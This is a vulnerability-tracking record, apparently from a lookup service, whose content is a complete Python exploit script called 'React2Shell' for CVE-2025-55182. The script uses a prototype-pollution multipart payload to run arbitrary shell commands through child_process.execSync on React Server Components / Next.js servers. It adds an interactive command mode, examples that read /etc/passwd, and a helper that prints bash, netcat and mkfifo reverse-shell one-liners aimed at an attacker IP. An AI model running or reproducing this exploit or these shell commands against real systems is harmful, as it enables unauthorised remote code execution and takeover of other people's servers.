{"uuid": "eb2fc234-7dce-48c6-90ea-deed61d97fd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55182", "type": "seen", "source": "https://gist.github.com/neutrinox4b1/d8208b4420c3bb72e99b4cb0cf3225bf", "content": "#!/usr/bin/env python3\n\"\"\"\nReact2Shell Exploit for covering CVE-2025-55182\n\"\"\"\n\nimport requests\nimport sys\nimport argparse\nimport re\nimport json\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\ndef create_multipart_body(command):\n    \"\"\"\n    Generate the exact multipart payload that matches the working PoC\n    \"\"\"\n    \n    injection = (\n        f\"var res=process.mainModule.require('child_process')\"\n        f\".execSync('{command}',{{'timeout':5000}}).toString(). trim();;\"\n        f\"throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});\"\n    )\n    \n    payload_json = json.dumps({\n        \"then\": \"$1:__proto__:then\",\n        \"status\": \"resolved_model\",\n        \"reason\": -1,\n        \"value\": \"{\\\"then\\\":\\\"$B1337\\\"}\",\n        \"_response\": {\n            \"_prefix\": injection,\n            \"_chunks\": \"$Q2\",\n            \"_formData\": {\n                \"get\": \"$1:constructor:constructor\"\n            }\n        }\n    })\n    \n    boundary = \"----WebKitFormBoundaryx8jO2oVc6SWP3Sad\"\n    \n    body = (\n        f\"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\\r\\n\"\n        f\"Content-Disposition: form-data; name=\\\"0\\\"\\r\\n\"\n        f\"\\r\\n\"\n        f\"{payload_json}\\r\\n\"\n        f\"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\\r\\n\"\n        f\"Content-Disposition: form-data; name=\\\"1\\\"\\r\\n\"\n        f\"\\r\\n\"\n        f\"\\\"$@0\\\"\\r\\n\"\n        f\"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\\r\\n\"\n        f\"Content-Disposition: form-data; name=\\\"2\\\"\\r\\n\"\n        f\"\\r\\n\"\n        f\"[]\\r\\n\"\n        f\"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--\"\n    )\n    \n    return body, boundary\n\ndef extract_output(response_text):\n    \"\"\"\n    Extract command output from RSC response\n    The output appears in format: 1:E{\"digest\":\"OUTPUT_HERE\"}\n    \"\"\"\n    \n    patterns = [\n        r'1:E\\{\"digest\":\"([^\"]*)\"\\}',\n        r'\"digest\":\"([^\"]*)\"',\n        r'\"digest\":`([^`]*)`',\n        r'E\\{\"digest\":\"([^\"]*)\"\\}',\n    ]\n    \n    for pattern in patterns:\n        match = re. search(pattern, response_text)\n        if match:\n            output = match.group(1)\n            output = output.replace('\\\\n', '\\n')\n            output = output.replace('\\\\t', '\\t')\n            output = output.replace('\\\\r', '\\r')\n            return output\n    \n    return None\n\ndef exploit(target, command, proxy=None, verbose=False):\n    \"\"\"Execute the exploit\"\"\"\n    \n    url = target. rstrip('/')\n    body, boundary = create_multipart_body(command)\n    \n    headers = {\n        \"User-Agent\": \"Mozilla/5. 0 (Windows NT 10. 0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0. 0\",\n        \"Next-Action\": \"x\",\n        \"X-Nextjs-Request-Id\": \"b5dce965\",\n        \"X-Nextjs-Html-Request-Id\": \"SSTMXm7OJ_g0Ncx6jpQt9\",\n        \"Content-Type\": f\"multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad\",\n    }\n    \n    proxies = {\"http\": proxy, \"https\": proxy} if proxy else None\n    \n    try:\n        if verbose:\n            print(f\"[DEBUG] Sending request to {url}\")\n            print(f\"[DEBUG] Command: {command}\")\n        \n        response = requests.post(\n            url, \n            data=body, \n            headers=headers, \n            proxies=proxies,\n            verify=False,\n            timeout=15\n        )\n        \n        if verbose:\n            print(f\"[DEBUG] Status: {response.status_code}\")\n            print(f\"[DEBUG] Response:\\n{response.text[:500]}\")\n        \n        output = extract_output(response.text)\n        \n        if output:\n            return True, output\n        else:\n            return False, f\"Could not parse output.  Raw response:\\n{response.text}\"\n        \n    except requests.exceptions.Timeout:\n        return False, \"Request timed out (command may still have executed)\"\n    except Exception as e:\n        return False, str(e)\n\ndef main():\n    parser = argparse.ArgumentParser(\n        description='React2Shell Exploit - CVE-2025-55182',\n        formatter_class=argparse.RawDescriptionHelpFormatter,\n        epilog=\"\"\"\nExamples:\n  python3 CVE-2025-55182.py -t https://dev.target.local -c \"id\"\n  python3 CVE-2025-55182.py -t https://dev.target.local -c \"cat /etc/passwd\"\n  python3 CVE-2025-55182.py -t https://dev.target.local -i\n  python3 CVE-2025-55182.py -t https://dev.target.local -c \"whoami\" -v\n        \"\"\"\n    )\n    parser.add_argument('-t', '--target', required=True, help='Target URL')\n    parser.add_argument('-c', '--command', default='id', help='Command to execute')\n    parser.add_argument('-p', '--proxy', help='Proxy URL (e.g., http://127.0.0.1:8080)')\n    parser.add_argument('-i', '--interactive', action='store_true', help='Interactive mode')\n    parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')\n    \n    args = parser.parse_args()\n    \n    banner = r\"\"\"\n    .______       _______     ___       ______ .___________. __   __       _______. __    __   _______  __       __      \n    |   _  \\     |   ____|   /   \\     /      ||           ||  | |  |     /       ||  |  |  | |   ____||  |     |  |     \n    |  |_)  |    |  |__     /  ^  \\   |  ,----'`---|  |----`|  | |  |    |   (----`|  |__|  | |  |__   |  |     |  |     \n    |      /     |   __|   /  /_\\  \\  |  |         |  |     |  | |  |     \\   \\    |   __   | |   __|  |  |     |  |     \n    |  |\\  \\----.|  |____ /  _____  \\ |  `----.    |  |     |  | |  | .----)   |   |  |  |  | |  |____ |  `----.|  `----.\n    | _| `._____||_______/__/     \\__\\ \\______|    |__|     |__| |__| |_______/    |__|  |__| |_______||_______||_______|\n    \"\"\"\n    print(banner)\n    \n    if args.interactive:\n        print(f\"[*] Interactive mode - Target: {args.target}\")\n        print(\"[*] Type 'exit' or 'quit' to exit\")\n        print(\"[*] Type 'shell' for reverse shell helper\\n\")\n        \n        while True:\n            try:\n                cmd = input(\"\\033[91mreact2shell\\033[0m&gt; \").strip()\n                \n                if cmd.lower() in ['exit', 'quit']:\n                    print(\"[*] Exiting...\")\n                    break\n                    \n                if not cmd:\n                    continue\n                \n                if cmd.lower() == 'shell':\n                    print(\"\\n[*] Reverse Shell Commands:\")\n                    print(\"    bash -c 'bash -i &gt;&amp; /dev/tcp/YOUR_IP/9001 0&gt;&amp;1'\")\n                    print(\"    nc -e /bin/sh YOUR_IP 9001\")\n                    print(\"    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc YOUR_IP 9001 &gt;/tmp/f\")\n                    print(\"\")\n                    continue\n                \n                if cmd.lower() == 'help':\n                    print(\"\\n[*] Commands:\")\n                    print(\"      - Execute on target\")\n                    print(\"    shell          - Show reverse shell helpers\")\n                    print(\"    exit/quit      - Exit interactive mode\")\n                    print(\"\")\n                    continue\n                    \n                success, output = exploit(args.target, cmd, args.proxy, args.verbose)\n                \n                if success:\n                    print(output)\n                else:\n                    print(f\"\\033[93m[-] {output}\\033[0m\")\n                    \n            except KeyboardInterrupt:\n                print(\"\\n[! ] Interrupted\")\n                break\n            except EOFError:\n                break\n    else:\n        print(f\"[*] Target: {args.target}\")\n        print(f\"[*] Command: {args.command}\\n\")\n        \n        success, output = exploit(args.target, args.command, args.proxy, args.verbose)\n        \n        if success:\n            print(f\"\\033[92m[+] SUCCESS!\\033[0m\\n\")\n            print(output)\n        else:\n            print(f\"\\033[91m[-] FAILED\\033[0m\\n\")\n            print(output)\n\nif __name__ == \"__main__\":\n    main()", "creation_timestamp": "2026-07-08T14:11:22.386876Z"}